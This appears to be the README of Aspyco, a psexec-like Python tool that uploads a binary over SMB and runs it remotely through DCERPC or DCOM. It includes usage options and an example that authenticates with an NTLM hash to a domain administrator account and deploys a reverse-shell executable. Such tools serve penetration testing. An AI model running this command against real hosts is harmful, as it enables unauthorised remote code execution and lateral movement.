Aspyco

Inject your own venom 💉

Aspyco is a python script that permits to upload a local binary through SMB on a remote host.
Then it remotely connects to a named pipe through DCERPC or via DCOM to create and execute your payload.

It's a psexec-like with custom execution !!

What da fuck is this ?

On Windows, RPC protocol permits to call remote functions.
Remotely, you can connect on SMB named pipe to call functions with DCERPC protocol.
In that way, you can upload a binary file through SMB and then call some functions
to create a service to execute your payload.
You can also remotely execute binaries with WMI through a DCOM connection.

Installation

From sources :

git clone https://github.com/ProcessusT/Aspyco
cd Aspyco
python3 aspyco.py -h

Usage

Aspyco uses Impacket syntax :

usage: aspyco.py [-h] [-payload PAYLOAD] [-listener_ip LISTENER_IP] [-listener_port LISTENER_PORT] [-method METHOD] [-hashes LMHASH:NTHASH] target

Upload and start your custom payloads remotely !

positional arguments:
  target                	[[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            	show this help message and exit
  -payload PAYLOAD      	Your custom binary file
  -listener_ip LISTENER_IP	Listener ip address if no custom payload is specified
  -listener_port LISTENER_PORT	Listener port if no custom payload is specified
  -method METHOD        	{"DCERPC-SVCCTL", "DCERPC-ATSVC", "DCOM"} - Default : DCERPC-SVCCTL
  -hashes LMHASH:NTHASH		NTLM hashes, format is LMHASH:NTHASH

Example

aspyco -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 custom_reverse_shell.exe